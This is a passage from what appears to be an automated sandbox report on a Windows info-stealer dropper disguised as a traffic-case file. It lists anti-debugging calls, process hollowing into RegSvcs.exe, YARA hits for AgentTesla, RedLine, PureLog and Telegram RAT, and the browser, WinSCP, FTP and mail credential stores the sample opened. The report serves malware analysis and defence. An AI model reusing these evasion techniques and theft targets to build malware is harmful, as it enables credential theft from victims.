Code function: 0_2_00BB3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00BB3B4C

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BE5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00BE5CCC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

11_2_004019F0

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C2C304 LoadLibraryA,GetProcAddress,

0_2_00C2C304

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_015135E0 mov eax, dword ptr fs:[00000030h]	0_2_015135E0
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_01513580 mov eax, dword ptr fs:[00000030h]	0_2_01513580
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_01511ED0 mov eax, dword ptr fs:[00000030h]	0_2_01511ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00F135E0 mov eax, dword ptr fs:[00000030h]	8_2_00F135E0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00F13580 mov eax, dword ptr fs:[00000030h]	8_2_00F13580
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00F11ED0 mov eax, dword ptr fs:[00000030h]	8_2_00F11ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 10_2_00F035E0 mov eax, dword ptr fs:[00000030h]	10_2_00F035E0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 10_2_00F01ED0 mov eax, dword ptr fs:[00000030h]	10_2_00F01ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 10_2_00F03580 mov eax, dword ptr fs:[00000030h]	10_2_00F03580

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C081F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00C081F7

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BDA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BDA395
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BDA364 SetUnhandledExceptionFilter,	0_2_00BDA364
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_009EA395
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009EA364 SetUnhandledExceptionFilter,	8_2_009EA364
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_004123F1 SetUnhandledExceptionFilter,	11_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\directory\name.exe

Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 430000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: ABF008

Jump to behavior

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C08C93 LogonUserW,

0_2_00C08C93

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BB3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00BB3B4C

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BB4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00BB4A35

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C14EC9 mouse_event,

0_2_00C14EC9

Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

0_2_00C081F7

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C14C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00C14C03

Source: Case_Your company bad driver Vehicle No.exe, name.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Case_Your company bad driver Vehicle No.exe, name.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BD886B cpuid

0_2_00BD886B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

11_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BE50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00BE50D7

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BF2230 GetUserNameW,

0_2_00BF2230

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BE418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00BE418A

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BB4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00BB4AFE

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3842075995.00000000032B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3842075995.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3842075995.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.name.exe.33a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.name.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3842075995.000000000330C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3842075995.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8
Source: name.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3842075995.00000000032B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3842075995.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3842075995.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
